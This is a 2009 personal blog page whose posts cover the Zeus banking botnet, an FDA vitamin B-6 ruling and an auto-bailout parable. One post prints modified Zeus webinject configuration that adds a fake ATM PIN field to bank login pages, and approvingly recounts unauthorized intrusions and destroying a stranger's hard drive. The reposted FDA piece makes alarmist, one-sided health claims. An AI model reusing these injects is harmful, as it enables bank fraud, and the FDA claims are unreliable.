April 30, 2009

The Underground of the Cyber Age, PT II

Following the post below, I found a post on one of the sites i found. I found it very interesting. I'm not going to go into the entire story of what it's about, but i will give you one in particular post. It just makes you think twice about what is really happening in the world of the underground.

The post was original made December 22, 2008. Shortly after the Conficker worm was detected. I've also included related links in the posted text.




Quote:
Originally Posted by XXXXXXXXXX View Post
What are you smoking?

Zeus have never been open source and it isn't a phishing botnet too. It is professional form grabber, used for banking and similar things. Webpart have not been encrypted, but that doesn't mean that it is opensource!


My, didn't YOU get out of the wrong side of the bed, XXXXXXXXXXX! A water pump in a car does not make a motor car what it is. It just pumps water around the engine serving a basic purpose. It is the sum total of all the other parts that make the car what it is. Change the water pump for any other type that has the same specs, and the car is still the same car it always was.

Zeus, in the context of this thread, IS a phishing botnet!

And looking at the version 1.0.6.18 I got from meta-human (see his post), I am looking at 62/63 totally open source files of html, PHP and config related text files. Oh, and one little exe (aka the water pump).

Zeus (the phishing botnet) was first developed by a very smart Russian programmer who calls himself A-Z, and is said to be about 24 yars old. He cut his teeth by infecting the world with worms for fun, but then decided to monetize his efforts when he became a hired/contract gun for the Russian Business Network (though it wasn't called that then).

He started by selling his phishing botnet for $3,000, but then found market prices crashed when many others rebranded his open scripts, control panel etc, and so he took a different tack.

Last summer he helped a German cybercrime gang empty $6,000,000 from the commercial customers of 20 European banks by customizing his Zeus phishing botnet.

How it worked was that from the HUGE number of phished bank account data collected, they combed it to find those accounts which were commercial accounts. The reason being was that the banks had limited Internet transfers to commercial customers with special certifcates.

The A-Z/Zeus/German gang then used a "spear phishing" campaign against these commercial customers with a "man in the middle technique".

Spear phishing is basically a targeted phishing attack, and man-in-the-middle is where the real customer logs into his real account, and the botnet sneeks through a cash transfer of $5,000-$10,000 while he is not looking.

All very clever, all well coordinated, all undertaken by use of the Zeus phishing botnet by its author, A-Z.





Here are a few interesting links of reading, that delve a little deeper into what is happening out there.

Interview with originator of MPack.
There's a Cyber War Looming
RBNExploit Blog
Share:

The Underground of the Cyber Age, PT I

Since i got my first PC back in 1999, i tore the thing apart to see how it works. I played with this and that, i was curious. In the true sense of the word, i was a hacker. Even long before i knew what a PC was, when it came to anything mechanical or electronic. I wanted to see how it worked, to see if i could make it work better and even make it do things it wasn't meant to do.

This whole new Cyber World was interesting. I could talk to people from long distances without running up a phone bill. I could put my art out there for everyone to see and i i could run into more assholes then i wanted to. But when the time came and i lost my bank card to someone on the net, i learned of a whole new genre or sub-sect of this Cyber World.

Call them hackers, phreakers or script kiddies, these groups of people have a whole other way of living in their off time and some full time. So back in the year 2000, i started to teach myself computer security. I didn't want this to happen again. So i read everything i could. Learned what a virus was, how worms worked, what a trojan was. Even taught myself how to code some of these things. I created a few small simple virus that did nothing but replicate a text file up to 1,000 times before it deleted itself. But i never released it to the public or in the "wild".

I even used the popular trojans of the day like Sub7, Back Orrifice and Hack a 'Tack. And out of the countless systems that were ever compromised, i learnt how to subvert firewalls and security software. And out of all those systems, only once and once ever did i damage a system. Some guy in Italy looking at child porn. I played with him a few minutes then i uploaded a program called Hard Drive Killer and set it to look like his security software. Gave him an error message that his software errored and he needed to update it. He ran my software and boom, no more hard drive.

Shortly after that, i got bored with all of that. I got good at removing the infections that the others were releasing. It even landed me some jobs and cash helping protect PC's. And i have stuck with that path for a long time now. And in my current job, i am doing just that plus a lot of other PC related business. But in the last 6-8 months, i have been looking into a career change. That along the lines of computer forensics. So i started looking into it as i went about my daily business. And during this time, including today, i have dealt with all of the new virus, infections, malware, etc. And i have seen how much more sophisticated it has become and how much harder it is for the security vendors to keep up with it. A perfect example is with the new Conficker worm. For the longest time, no one knew what was going to happen went it went off.

Anyways, i read on a daily basis of all the lawsuits for copyright this, trademark this, RIAA, MPAA, etc. And then i read my security blogs and other news. And the amount of people i talk to on a daily basis that really have no clue on what the PC really is other then a toy to get music and watch movies. How much we have become dependent on a piece of machinery to run our lives. And yet i just found out, no matter how much i have read, i'm the one that really doesn't understand. Just the other night, i got that wake up call.

I was Googling for something, which i have forgotten what it was, i came across a link. Opening the link to the site, i discovered a tool that i had heard about only month before all over the different sites i read. A new virus maker. Cool i thought, a new toy i can play with and look at. So i downloaded it, loaded up my virtual pc and had a look. Nothing special. it could create a small virus that does a lot from blocking certain aspects of the PC to formatting the hard drive. I've seen these programs in the past. So as i was ready to call it a night, i opened the Read Me file that was with it. In the file, it included the site of the maker. So i opened it. Total foreign language. But there was something in English so i had a look. One thing led to another and i found other sites, and more sites and more sites.

I Googled a few of these sites and nothing came in return. I tried a few more and got a few lucky results. But the ones that really have the goods, weren't coming up in any search. So i bookmarked them for later viewing and went to bed. Just the other night, i started looking through these sites on my virtual PC. I came across one i had booked marked and started reading through the forums. Some of it in English, some of it in Russian. next thing i knew, after downloading and looking at some things, and done reading for the night, it was 5am.

Last night however, really opened my eyes. It made me realize that what i thought was the underground of the Cyber World is more a facade of kids and automated programs. On one of these sites, there was talks from a hacker about a new botnet he was working on. For those of you who don't know what a botnet is, read this.

So i'm reading through this post. The hacker is from Russia. Along with a few of his counterparts on this site. He goes on to talk about what this new botnet is. He even put a beta version of it out for other people to take a look at. This post and some of the others i have read, is where it all kind of comes together.

Basically, the hacker creates the worms, virus's or botnet's and then sells them to the highest bidder. The things these people create are not your everyday mill of the run things you might see. But the complicated and sophisticated stuff that can really do a number. This hacker said that once it's done, he will have a public release for anyone to use, then a private release which is for sale that has more controls in it as well as support for it. His asking price, currently around $3,000. That's a hell of a lot of money for a piece of programing, but then so is the price of some of the software i have bought over the years.

Apparently that's how this underground works. And the price varies depending on the product. So i continued reading and even downloaded his trial version. Now, i'm a mediocre web designer. I can code in HTML, XHTML, CSS and some PHP. But what i saw was speechless. What i had in my hand, was the newest, undetectable banking botnet. Meaning, it was designed to steal any and all banking, Ebay, Paypal information from ones PC once it was infected. This is accomplished by whats called a drive by download. Same thing as a drive by shooting, only instead of a human life, it's your financial life.

So i started going through the code. Some of it i understood. Most of it, was a little over my head, but i'm sure i can figure it all out. But even then, it wasn't the code that got me. It was what was in the included files that struck a nerve. So what was it? I'll paste only a few parts of it, with modified code show it shows up.



set_url https://www.us.hsbc.com/* GL
data_before
< cellspacing="0" summary="page layout">
data_end
data_inject
data_end
data_after
< /table>
data_end


set_url https://online.wellsfargo.com/login* GP
data_before
< input type="password" name="password"*
data_end
data_inject
< width="225">< for="password" class="formlabel">3. ATM PIN< /label><>
< type="password" name="USpass" id="atmpin" size="20" maxlength="14" title="Enter ATM PIN" tabindex="11" accesskey="A">
<> < /td>
data_end
data_after
data_end
data_before
< for="account" class="formlabel">
data_end
data_inject
4. Sign on to
data_end
data_after
< /label>
data_end


set_url https://online.wamu.com/Servicing/Servicing.aspx?targetPage=AccountSummary GL
data_before
_accountSummaryContainer"*< /tr>
data_end
data_inject
data_end
data_after
< /table>
data_end




And the list went on and on and on. Then after the listing of the financial business, was all of the extra injection code. All of this is designed to get your username and passwords to your banks, PayPal, etc and email it in a text file back to whom ever controls it. And on the other side, is someone looking to make a few extra (thousands) dollars. All for buying a program someone created. So what does this mean to you and I? When your browsing the internet, be careful. Any site on the net can be infected with one of these drive by downloads.

The fact that someone has taken this "toy" that we use on a daily basis and use it in away that makes the mob of the days gone by look like children is in fact scary. Most people only hear about it on the news or in the paper. Very few understand it, much more could care less. but when you have an understanding of a few aspects of what's happening, and to finally see this in full black and white, it gives you a whole new outlook on the entire Cyber World thing.

Will this ever stop? 90% no. Only because these people have the knowledge and the know how to craft their skills to stay ahead of the norm. Though a few get picked off here and there, the underground is so large, we would have to cull the planet of PC's and the govt's of the world would have to outlaw them. And even then, i don't think it would be 100% gone.
Share:

April 16, 2009

KISS MY ASS

Literally, the whole world can kiss my ass. Pucker up, plant a big one and say thank you may i have another.
Share:

Vitamin B-6 Declared a “Drug” by FDA

Taken from another blog...



God help us, because the FDA has now opened the gateway for all vitamins to be declared “drugs” and removed from sale by the nutritional supplement industry.

What they have done is declared that pyridoxamine (one of the three primary forms of vitamin B-6) is in reality a “new drug,” thus clearing the way for it to be banned from sale as a nutritional supplement. (See the news article below this commentary for more details.)

Here’s what happened:

Some years back a North Carolina-based firm called Biostratum began research and testing on a pyridoxamine-based drug, which they called Pyridorin. It is designed to prevent the progression of diabetic nephropathy (kidney disease). The company then petitioned the FDA to declare pyridoxamine a “new drug,” clearing the way for them to hold an iron-clad monopoly on its sale.

Today, the FDA agreed with Biostratum, and declared this form of vitamin B-6 to indeed be a “new drug,” using the argument that its medical qualities had been under investigation for years before it was ever used as a nutritional supplement under the DSHEA, which ironically was enacted in 1994 in order to protect nutritional supplements from excessive FDA regulation.

Not to worry, said many observers in the nutritional supplement industry. After all, there are other forms of vitamin B-6 that can still be used in multi-vitamin formulations. The problem is, another drug company has already petitioned the FDA to declare the second most popular form of B-6, pyridoxal 5'-phosphate, which is also called P5P, a “new drug,” apparently for the very same reason pyridoxamine has been declared a drug, i.e., it’s purely medical qualities have been investigated long before it was ever used as a nutritional supplement.

How much longer other forms of B-6 will be declared a “drug”? You can bet your boots the pharmaceutical companies are racing to get in on the FDA’s new fast-track for turning B-vitamins into drugs.

Will All Vitamins Eventually Be Declared Drugs?

Worst of all, the very same argument being used to declare vitamin B6 a “drug” can essentially be made for any vitamin. After all, every known vitamin on the face of the earth has been studied for their medicinal qualities even since the discovery of the existence of vitamins in food back in 1905, when a scientist named William Fletcher realized that foods contained special nutrients that actually prevented disease.

It is easy to see that the day is soon-coming in which all vitamins will be offered solely as “drugs,” by prescription only.

One of the most galling aspects of the whole thing is that the FDA flatly refuses to allow nutritional supplement manufacturers to even mention the incredible medicinal values of the vitamins, minerals and other supplements they sell. Indeed, the FDA routinely claims vitamin and mineral supplements are “useless” and “inert.”Yet when a drug company develops the same natural molecule as a “drug,” suddenly its medical benefits can be touted from the rooftops. The only problem is, the drug company is given a monopoly to produce the “drug,” and what was once a natural product available inexpensively in any health food store in America is now an expensive drug you have to get a prescription for.

Drug-Induced B-6 Deficiency a Growing Phenomena

Another serious issue regarding B-6 is that a growing number of medications actually deplete the body of this vital nutrient that is absolutely essential to life. The syndrome is called Drug Induced Pyridoxine Deficiency, and several drugs, including drugs for the treatment of tuberculosis, Parkinson’s Disease and for cancer are known to cause this syndrome, which essentially turns you into a mental vegetable by depleting your body of its needed stores of vitamin B-6.

Foods that Contain Vitamin B-6 Naturally

Under the circumstances it is important to note that certain foods contain vitamin B-6 naturally. They are, in order of their content percentage of the recommended daily value of the vitamin:

Baked potato, flesh and skin, 1 medium: 0.7 mg ~ 35% DV
Banana, raw, 1 medium: 0.68 mg ~ 34% DV
Garbanzo beans, canned, 1/2 c: 0.57 mg ~ 30% DV
Chicken breast, meat only, cooked, 1/2 breast: 0.52 mg ~ 25% DV
Pork loin, lean only, cooked, 3 oz: 0.42 mg ~20% DV
Roast beef, eye of round, lean only, cooked, 3 oz: 0.32 mg ~ 15% DV
Trout, rainbow, cooked, 3 oz: 0.29 mg ~ 15% DV
Sunflower seeds, kernels, dry roasted, 1 oz: 0.23 mg ~ 10% DV
Avocado, raw, sliced, 1/2 cup: 0.2 mg ~ 10% DV
Salmon, Sockeye, cooked, 3 oz: 0.19 mg ~ 10% DV
Tuna, canned in water, drained solids, 3 oz: 0.18 mg ~ 10% DV
Peanut butter, smooth, 2 Tbs: 0.15 mg ~ 8% DV

More importantly, safe, simple Brewer’s Yeast contains relatively high levels of B-vitamins, including B-6. Capsulated Brewer’s Yeast can be purchased in just about any health food store in the country, or is available through many online sources.

What to Do Now

Legally speaking, as of today, anyone wanting to purchase the pyridoxamine form of B-6, and probably soon the P5P form, will have to have a doctor's prescription to do so.

One thing you can do is go to the web site of the American Association for Health Freedom and sign their petition to stop the FDA from turning any more vitamins into drugs.

You should also write and call your Congressmen and Senators immediately, and tell them you don’t want the FDA banning any more vitamins by turning them into “drugs.”
It is high time we all start expressing our outrage at this outlandish behavior by the FDA and other bureaucracies in regards to their disdain for nutritional supplements. We now have the EPA trying to re-classify colloidal silver as a "pesticide" so they can ban its sale in health food stores. And we have the FDA actually re-classifying common vitamins as drugs. And it is all at the behest of the major pharmaceutical companies.


The handwriting is on the wall. And frankly, it is up to "we the people" to put a stop to this egregious breach of our health freedoms.

-- S. Spencer Jones

FDA Declares Form of Vitamin B6 a Drug, Effectively Banning Pyridoxamine from Dietary Supplements
http://www.naturalnews.com/025606.html

Thursday, February 12, 2009 by: Mike Adams, the Health Ranger, NaturalNews Editor

(NaturalNews) The FDA has effectively banned a naturally-occurring form of vitamin B6 called pyridoxamine by declaring it to be a drug, reports the American Association for Health Freedom.
Responding to a petition filed by a drug company, the FDA declared pyridoxamine to be "a new drug."

Now, any nutritional supplements containing pyridoxamine will be considered adulterated and illegal by the FDA, which may raid vitamin companies and seize such products. See the history of FDA raids on vitamin companies here: http://www.naturalnews.com/021791.html

Pyridoxamine occurs naturally in fish, chicken and other foods (http://en.wikipedia.org/wiki/Vitamin_B6), putting the FDA in the strange position of banning a substance from dietary supplements even though it is already present in the food supply.

The FDA's war on Mother Nature

It's not the first time the FDA has declared a natural molecule to be a "drug" while attacking nutritional supplements that contain the same molecule. A similar story unfolded with red yeast rice and the lovastatin molecules it contains that lower high cholesterol. The drug companies engaged in biopiracy, ripping off the molecule from red yeast rice to make their now-famous "statin drugs."

Once the statin drugs were patented, Big Pharma and the FDA went after red yeast rice, claiming the supplement was "adulterated with pharmaceuticals." It wasn't really adulterated, of course. It just contained a natural statin-drug-like molecule that the drug companies copied and patented.

It would be like Big Pharma patenting vitamin C, then the FDA claiming that all oranges and lemons were adulterated with drugs because they naturally contain their own vitamin C.

This is the insanity of the FDA as it operates today. You can read more about the FDA on our channel webiste www.FDAreform.org which is updated every few days.

So will this ruling on pyridoxamine affect nutritional supplements? Yes, any supplements containing this form of vitamin B6 can now be declared "adulterated" by the FDA. Manufacturers of such supplements can be arrested and shut down for engaging in "illegal drug trafficking." Such is the nature of the FDA's agenda to criminalize nutritional supplement companies and limit consumers' access to Mother Nature's remedies.

The pyridoxamine "drug," by the way (which is just pyridoxamine), is designed to prevent the progression of diabetic nephrothapy (kidney disease). Most likely, the FDA will eventually approve the "drug" for that condition, even while claiming vitamin B6 supplements containing the very same chemical are useless and inert.

This is another classic oppression tactic of the FDA: Ban the herb, but promote the drug using the same chemicals. The same thing happened with ephedra, a Traditional Chinese Medicine herb known as ma huang. The FDA banned the herb, saying it was "dangerous at any dose," but pharmaceuticals containing the very same molecules (ephedrine) are still being sold over-the-counter as cold medicines, meaning they're available to any child without a prescription.

The bottom line is this: FDA approvals and bans have nothing to do with science and everything to do with protecting drug companies profits. If a drug company can make money selling a vitamin as a drug, the FDA will gladly ban the vitamin and protect the drug. If a drug company can rip off molecules from Mother Nature and patent them, the FDA will ban those same molecules found in nature.

All of this points to the urgent need to reform the FDA. A new petition demanding real FDA reform will be announced here on NaturalNews in the coming days.
Share:

A Modern Parable to the Auto Bailout

A Japanese company (Toyota) and an American company (CHRYSLER) decided to have a canoe race on the River. Both teams practiced long and hardto reach their peak performance before the race.

On the big day, the Japanese won by a mile.

The Americans, very discouraged and depressed, decided to investigate the reason for the crushing defeat. A management team made up of senior management was formed to investigate and recommend appropriate action.

Their conclusion was the Japanese had 8 people rowing and 1 person steering, while the American team had 7 people steering and 2 people rowing.

Feeling a deeper study was in order, American management hired a consulting company and paid them a large amount of money for a second opinion.

They advised, of course, that too many people were steering the boat, while not enough people were rowing.

Not sure of how to utilize that information, but wanting to prevent another loss to the Japanese, the rowing team's management structure was totally reorganized to 4 steering supervisors, 2 area steering superintendents and 1 assistant superintendent steering manager.


They also implemented a new performance system that would give the 2 people rowing the boat greater incentive to work harder. It was called the 'Rowing Team Quality First Program,' with meetings, dinners and free pens for the rowers. There was discussion of getting new paddles, canoes and other equipment, extra vacation days for practices and bonuses. The pension program was trimmed to 'equal the competition' and some of the resultant savings were channeled into morale boosting programs and teamwork posters.

The next year the Japanese won by two miles.

Humiliated, the American management laid off one rower, halted development of a new canoe, sold all the paddles, and canceled all capital investments for new equipment. The money saved was distributed to the Senior Executives as bonuses.

The next year, try as he might, the lone designated rower was unable to even finish the race (having no paddles,) so he was laid off for unacceptable performance, all canoe equipment was sold and the next year's racing team was out-sourced to India.

the End.



Here's something else to think about: Ford has spent the last thirty years moving all its factories out of the US, claiming they can't make money paying American wages.

TOYOTA has spent the last thirty years building more than a dozen plants inside the US. The last quarter's results:


TOYOTA makes 4 billion in profits while Ford racked up 9 billion in losses.

Ford folks are still scratching their heads, and collecting bonuses...
Share:

April 4, 2009

Car's, cars and more cars

Share:

Categories

Adrenaline (1) Art (17) Bucket List (1) Buffy (6) Cars (1) Charles Boyer (1) Christmas (1) Classics (2) Collections (4) Computers (16) confusion (3) corporate greed (7) Design (8) Dreams (10) fantasy (4) Feelings (1) Forza 6 (1) Frustration (4) Fun (3) funny (11) games (1) Gaming (3) General (91) Google+ (3) greed (3) Halloween (1) health (12) Hedy Lamarr (2) Hollywood Classics (1) horror (5) Ignorance (7) imagination (3) Journalism (1) Life (77) macabre (4) Military (1) Minecraft (3) Monster Trucks (1) Movie (3) Music (9) Ouch (2) Photos (1) Politics (24) Rant's (110) Religion (3) Romance (2) Sad (13) School (3) Silver Screen (1) Speed TV (1) Sports (6) Stupidity (2) Tech (18) TV (4) unemployment (2) Weird (2) World (5) Writings (11) WTH (5)

Google+ Followers

Copyright © Alt+F4 | Powered by Blogger